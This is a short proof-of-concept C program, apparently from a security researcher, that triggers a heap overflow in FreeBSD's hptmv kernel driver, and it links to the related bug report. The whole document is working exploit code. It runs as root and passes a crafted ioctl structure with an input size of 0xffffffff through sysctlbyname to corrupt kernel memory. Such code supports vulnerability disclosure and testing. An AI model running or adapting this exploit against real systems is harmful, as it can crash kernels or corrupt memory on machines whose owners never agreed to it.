FreeBSD hpt_set_info heap overflow PoC

hptmv.c

/*
	FreeBSD kernel vulnerability PoC for:
	https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206585#c2
	
	Needs to be run as root.
	
	If hptmv kernel module not loaded:
		kldload hptmv
		
	Using:
		fetch -o hptmv.c http://192.168.0.4/hptmv.c
		clang hptmv.c -o hptmv
		./hptmv
	
	- CTurt
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/sysctl.h>

#define HPT_IOCTL_MAGIC 0xA1B2C3D4
typedef int DWORD;
typedef void *LPVOID, *LPDWORD;
typedef struct _HPT_IOCTL_PARAM {
	DWORD   Magic;                 /* used to check if it's a valid ioctl packet */
	DWORD   dwIoControlCode;       /* operation control code */
	LPVOID  lpInBuffer;            /* input data buffer */
	DWORD   nInBufferSize;         /* size of input data buffer */
	LPVOID  lpOutBuffer;           /* output data buffer */
	DWORD   nOutBufferSize;        /* size of output data buffer */
	LPDWORD lpBytesReturned;       /* count of bytes returned */
} HPT_IOCTL_PARAM;

int main(void) {
	int result = 0;
	errno = 0;
	
	void *buffer = malloc(0x4000);
	
	DWORD bytesReturned;
	
	HPT_IOCTL_PARAM params;
	params.Magic = HPT_IOCTL_MAGIC;
	params.dwIoControlCode = 0;
	params.lpInBuffer = buffer;
	params.nInBufferSize = 0xffffffff;
	params.lpOutBuffer = buffer;
	params.nOutBufferSize = 0x1;
	params.lpBytesReturned = &bytesReturned;
	
	size_t size = sizeof(params);
	
	printf("Triggering...\n");
	result = sysctlbyname("hptmv.status", NULL, NULL, &params, size);
	
	printf("result %d\n", result);
	printf("errno %d\n", errno);
	
	free(buffer);
	
	return 0;
}